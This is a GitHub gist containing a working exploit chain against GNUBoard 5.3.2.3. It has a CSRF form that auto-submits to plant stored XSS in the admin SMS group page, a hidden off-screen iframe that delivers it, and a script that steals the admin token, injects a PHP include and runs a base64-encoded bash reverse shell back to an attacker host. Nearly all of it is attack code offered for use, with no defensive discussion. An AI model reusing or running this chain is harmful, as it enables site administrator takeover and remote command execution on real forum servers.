Last active
February 6, 2021 15:11
-
-
Save stypr/c8c51f0653701a20bcaa17da5f86c932 to your computer and use it in GitHub Desktop.
Revisions
-
stypr revised this gist
Mar 7, 2020 . No changes.There are no files selected for viewing
-
Mar 6, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,13 @@ <!-- Stored XSS (2019.01.02) --> <form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST"> <input type='hidden' name='fg_no' value=''> <input type='hidden' name='fg_name' id='payload' value=''> </form> <script> var random = Math.round(Math.random() * 1000000000); var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin document.getElementById('payload').value = '" onfocus="$.getScript(\'' + script_url + '\')//10.10.10.60/' + random + '" autofocus value=미분류 '; document.forms[0].submit(); </script> This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,19 @@ <!-- Exploit start --> <!doctype html> <html> <head> <title>gnuboard5</title> </head> <body> <h1>GNUBoard 5.3.2.3 RCE (Authenticated)</h1> Date: 2019-01-01<br> Affected Browsers: Chrome/Firefox/Edge<br> Affected Version: 5.3 ~ 5.3.2.3<br> <!-- Hide and load exploit.html --> <iframe id="iframe" src="exploit.html" style="width:100px; height:100px; border:0; border:none; position:absolute; top: -1000px; left: -2000px;"></iframe> </body> </html> This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,46 @@ /* CSRF -> RCE Script */ // Linux Server reverse shell -- Change it to your preferred option // base64 encoded of command ( /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.30/1337 0>&1' ) var cmd = 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEwLjMwLzEzMzcgMD4mMSc='; var ajax_token = ''; var co_id = 'community'; function stage3(){ // Stage3 : Execute command cmd = encodeURIComponent(cmd); var xhr = new XMLHttpRequest(); xhr.open('GET', '../../bbs/content.php?co_id=' + co_id + '&exe=echo ' + cmd + '|base64 -d|bash;%23', true); xhr.send(null); } function stage2(){ // Stage2 : upload vulnerable script post_data = 'w=&co_html=1&token=' + ajax_token + '&co_id=' + co_id + '&co_subject=커뮤니티&co_content=community&co_mobile_content=&co_skin=basic&co_mobile_skin=basic&co_tag_filter_user=0&co_include_head=../plugin/okname/hpcert1.php&co_include_tail=&captcha_key=&co_himg=&co_timg='; var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == XMLHttpRequest.DONE) { stage3(); } } xhr.open('POST', '../contentformupdate.php', true); xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); xhr.send(post_data); } function stage1(){ // Stage1 : Get admin token var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == XMLHttpRequest.DONE) { ajax_token = xhr.responseText.split('"token":"')[1].split('"')[0]; stage2(); } } xhr.open('GET', '../ajax.token.php', true); xhr.send(null); } // Start from stage1 stage1();